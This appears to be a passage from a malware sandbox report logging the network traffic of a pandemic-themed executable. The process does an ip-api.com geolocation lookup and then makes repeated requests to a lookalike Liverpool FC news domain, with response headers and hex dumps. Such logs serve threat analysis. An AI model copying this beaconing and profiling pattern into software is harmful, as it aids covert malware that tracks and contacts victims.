                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 35 35 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63
                                                                        Data Ascii: 1553<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnec
                                                                        Mar 9, 2021 22:18:43.525305033 CET2452OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:18:43.737683058 CET2454INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:43 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d1fd105031d6ef597105a551fadf09a981615324723; expires=Thu, 08-Apr-21 21:18:43 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74516400004aa959b7c000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=F1w0i8435sI5Gl4dPt%2B0F%2BY4xNOjRcQeiaA9j9U%2FJFvfyn6B0oXeYqhmo8iB1LxKV%2BOcVZiALzTGhVmDMNdrwZqlBgRx9MjyuJkeESKets4dsHPWDAbzVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d756623cbe4aa9-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnec
                                                                        Mar 9, 2021 22:18:46.385265112 CET3782OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:18:46.596021891 CET3783INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:18:46 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d74610539bf3d562685b6ac61ad27b71b1615324726; expires=Thu, 08-Apr-21 21:18:46 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba745c8f00004aa99f1df000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ptJIvG5ecSB4LWIE2exi5oeE7NX1AVjB1OITPNBfq%2BCBK%2BVGH4c6SmJyun%2FpPq65FFryoyTK76rM%2Bdks27vIjozKPSwJY8ef%2F3KRuO8CM9Ub1%2BMffvzk0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d756741b864aa9-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 35 37 62 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f
                                                                        Data Ascii: 157b<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preco


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.349715208.95.112.180C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Mar 9, 2021 22:19:02.418761015 CET4516OUTGET /json/ HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:02.470841885 CET4517INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:02 GMT
                                                                        Content-Type: application/json; charset=utf-8
                                                                        Content-Length: 281
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 37 38 22 7d
                                                                        Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.78"}


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.349720104.21.31.3980C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Mar 9, 2021 22:19:12.096379042 CET4548OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:12.311244965 CET4550INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:12 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=daa2b8247d04f361e15db06e6ca9806251615324752; expires=Thu, 08-Apr-21 21:19:12 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74c0fe0000c29f87833000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=EtFzX1WwI%2F4q7f3SPMP%2FXe97dg8flR7L0SosQijHDladtZHxDD1DA2lPv8FK7Y%2Fpt9QjimxjqdIWbN4qlyjgLHiC3qdmn0gQy95RiYL82lNJKfGoJXeWRQ%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d75714ce5ec29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect"
                                                                        Mar 9, 2021 22:19:12.858704090 CET5840OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-75F90208612A44FA7B0856621DD5DF3A.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:13.072628021 CET5841INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:13 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=daa2b8247d04f361e15db06e6ca9806251615324752; expires=Thu, 08-Apr-21 21:19:12 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:15 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74c3fa0000c29f3829f000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2APrtI3BM9BVRBjzcHfWmuYJRmfLDGH4SuOukxAXNsenbkPWs%2FVElbahvP3M5wFiob74YwcHcyNSGJYMKegIqZoIniU3Y71SgNh%2Fodgynzzadyo4LOQlZw%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757198bb6c29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" h
                                                                        Mar 9, 2021 22:19:19.530019045 CET7154OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-59F952AF6E65CA37DF9A6DD24C3AD6F0.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Mar 9, 2021 22:19:20.795794964 CET7164INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:20 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=d001dbf1a5389235131816560dbfb273f1615324759; expires=Thu, 08-Apr-21 21:19:19 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:17 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74de090000c29f93b5c000000001
                                                                        Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gATCpJT1pXklzjdIXpZyfYBLu5S9TBi8jrSxYidYY4T4PliD0js5CYeKwDxI8Z2wef9woAnAbKyuguXEfbv2Mp6LzVQaI57JeapPnLYG9mnHUdv6xaT7xg%3D%3D"}]}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757434e25c29f-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d
                                                                        Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href=


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.349727104.21.31.3980C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Mar 9, 2021 22:19:21.926287889 CET7889OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-62D0D2B15CF140C87AEA01E41DD7046D.html HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                        Host: liverpoolofcfanclub.com
                                                                        Connection: Keep-Alive
                                                                        Mar 9, 2021 22:19:22.362190008 CET7890INHTTP/1.1 200 OK
                                                                        Date: Tue, 09 Mar 2021 21:19:22 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        Set-Cookie: __cfduid=da76053200a110a83d8f4a44715963cb41615324761; expires=Thu, 08-Apr-21 21:19:21 GMT; path=/; domain=.liverpoolofcfanclub.com; HttpOnly; SameSite=Lax
                                                                        Last-Modified: Tue, 09 Mar 2021 18:47:12 GMT
                                                                        Vary: Accept-Encoding
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 08ba74e7640000c277322e8000000001
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XhAysjXNuxNREf1ibKoYnwdr3kEgR5mS4YGBRJniqyFTMHzOCN7orISz%2FIRuE9EZsdChzwXNx9jNATRgdBVUI7XWRvb98lm3DwSDVvMQuuwOwLNpwnyYHA%3D%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 62d757523851c277-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
